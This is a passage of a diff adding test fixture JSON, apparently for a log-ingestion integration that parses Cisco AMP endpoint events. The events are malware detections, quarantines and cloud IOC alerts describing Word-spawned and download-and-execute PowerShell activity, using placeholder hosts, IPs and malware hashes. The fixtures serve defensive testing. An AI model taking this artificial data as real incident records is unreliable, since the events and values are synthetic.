executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-13T10:13:08.000Z",
+                "action": "Cloud IOC",
+                "id": "1515298355162029000",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "38:1e:eb:ba:2c:15",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "38:1e:eb:ba:2c:15"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.WinWord.Powershell",
+                        "description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-13T10:00:07.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP"
+                ],
+                "hash": [
+                    "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP",
+                "hostname": "Demo_AMP"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701401029Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6508153524038140000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "38:1e:eb:ba:2c:15",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "38:1e:eb:ba:2c:15"
+                        ]
+                    },
+                    "detection_id": "6508153524038139905",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
+                }
+            },
+            "@timestamp": "2021-01-12T10:24:47.000Z",
+            "file": {
+                "name": "powershell.exe",
+                "path": "/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe",
+                "hash": {
+                    "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Exploit_Prevention_Audit"
+                ],
+                "hash": [
+                    "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Exploit_Prevention_Audit",
+                "hostname": "Demo_AMP_Exploit_Prevention_Audit"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:35.701402957Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-12T10:24:47.000Z",
+                "action": "Cloud IOC",
+                "id": "1521062325693667300",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "d2:78:15:4a:f4:a2",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "d2:78:15:4a:f4:a2"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.PowershellDownloadedExecutable.ioc",
+                        "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-12T10:15:22.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Exploit_Prevention_Audit"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Exploit_Prevention_Audit",
+                "hostname": "Demo_AMP_Exploit_Prevention_Audit"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Policy Update",
+                "ingested": "2021-09-12T17:32:35.701404886Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
+                "id": "6532910514396201000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "d2:78:15:4a:f4:a2",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "d2:78:15:4a:f4:a2"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648130
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "explorer.exe",
+                "pid": 2632,
+                "hash": {
+                    "sha1": "84123a3decdaa217e3588a1de59fe6cee1998004",
+                    "sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef",
+                    "md5": "38ae1b3c38faef56fe4907922f0385ba"
+                }
+            },
+            "@timestamp": "2020-12-25T05:49:09.000Z",
+            "file": {
+                "name": "OLD.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe",
+                "hash": {
+                    "sha1": "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c",
+                    "sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9",
+                    "md5": "cfdd16225e67471f5ef54cab9b3a5558"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "hash": [
+                    "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9",
+                    "cfdd16225e67471f5ef54cab9b3a5558",
+                    "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701406760Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6525520937264087000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.GenericKD:Malwaregen.21do.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6525520937264087041",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2020-12-25T05:49:09.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "hash": [
+                    "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701408626Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6525520937264087000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ]
+                    },
+                    "detection_id": "6525520937264087041",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "powershell.exe",
+                "pid": 4868,
+                "hash": {
+                    "sha1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d",
+                    "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7",
+                    "md5": "92f44e405db16ac55d97e3bfe3b132fa"
+                }
+            },
+            "@timestamp": "2020-12-25T05:30:44.000Z",
+            "file": {
+                "name": "twhy.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe",
+                "hash": {
+                    "sha1": "7d9518ea3f98d037745352b23861fab05d3777dc",
+                    "sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117",
+                    "md5": "c624d61b8f076c3ef05f74eeb96c8954"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "hash": [
+                    "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117",
+                    "c624d61b8f076c3ef05f74eeb96c8954",
+                    "7d9518ea3f98d037745352b23861fab05d3777dc"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701410523Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6525516191325225000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "Auto.F2863A.211556.in02",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6525516191325224961",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2020-12-25T05:30:44.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "hash": [
+                    "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701412407Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6525516191325225000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ]
+                    },
+                    "detection_id": "6525516191325224961",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"
+                }
+            },
+            "@timestamp": "2020-12-25T05:30:41.000Z",
+            "file": {
+                "name": "powershell.exe",
+                "path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe",
+                "hash": {
+                    "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "hash": [
+                    "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:35.701414261Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}",
+                "kind": "alert",
+                "start": "2020-12-25T05:30:41.000Z",
+                "action": "Cloud IOC",
+                "id": "1519340132516139000",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
